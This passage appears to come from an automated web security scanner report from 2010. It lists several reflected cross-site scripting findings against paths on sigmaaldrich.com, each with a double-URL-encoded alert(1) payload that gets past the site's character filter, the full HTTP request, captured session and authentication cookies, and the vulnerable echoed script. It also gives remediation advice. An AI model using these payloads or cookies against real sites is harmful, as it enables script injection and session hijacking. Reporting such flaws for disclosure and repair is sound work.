Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:58 GMT
Content-Length: 28955
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etcdfc7b";alert(1)//f1d6d11a0ec/medialib/labware/labware-icons/multiwell-plates","E404") ;
   </script>
...[SNIP]...

1.379. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/multiwell-plates [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/multiwell-plates

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a2ebf%2522%253balert%25281%2529%252f%252f38be9881d52 was submitted in the REST URL parameter 2. This input was echoed as a2ebf";alert(1)//38be9881d52 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialiba2ebf%2522%253balert%25281%2529%252f%252f38be9881d52/labware/labware-icons/multiwell-plates HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:00 GMT
Content-Length: 28955
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialiba2ebf";alert(1)//38be9881d52/labware/labware-icons/multiwell-plates","E404") ;
   </script>
...[SNIP]...

1.380. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/multiwell-plates [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/multiwell-plates

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cce6a%2522%253balert%25281%2529%252f%252f8ebe7c80733 was submitted in the REST URL parameter 3. This input was echoed as cce6a";alert(1)//8ebe7c80733 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labwarecce6a%2522%253balert%25281%2529%252f%252f8ebe7c80733/labware-icons/multiwell-plates HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:02 GMT
Content-Length: 28955
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labwarecce6a";alert(1)//8ebe7c80733/labware-icons/multiwell-plates","E404") ;
   </script>
...[SNIP]...

1.381. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/multiwell-plates [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/multiwell-plates

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7e4b%2522%253balert%25281%2529%252f%252fbf11d69f6c4 was submitted in the REST URL parameter 4. This input was echoed as e7e4b";alert(1)//bf11d69f6c4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labware/labware-iconse7e4b%2522%253balert%25281%2529%252f%252fbf11d69f6c4/multiwell-plates HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:04 GMT
Content-Length: 28955
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware/labware-iconse7e4b";alert(1)//bf11d69f6c4/multiwell-plates","E404") ;
   </script>
...[SNIP]...

1.382. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/multiwell-plates [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/multiwell-plates

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e16d0%2522%253balert%25281%2529%252f%252f236deded540 was submitted in the REST URL parameter 5. This input was echoed as e16d0";alert(1)//236deded540 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labware/labware-icons/multiwell-platese16d0%2522%253balert%25281%2529%252f%252f236deded540 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:06 GMT
Content-Length: 28955
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware/labware-icons/multiwell-platese16d0";alert(1)//236deded540","E404") ;
   </script>
...[SNIP]...

1.383. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/ph-supplies [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/ph-supplies

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8df8a%2522%253balert%25281%2529%252f%252f53c8f92fc22 was submitted in the REST URL parameter 1. This input was echoed as 8df8a";alert(1)//53c8f92fc22 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc8df8a%2522%253balert%25281%2529%252f%252f53c8f92fc22/medialib/labware/labware-icons/ph-supplies HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
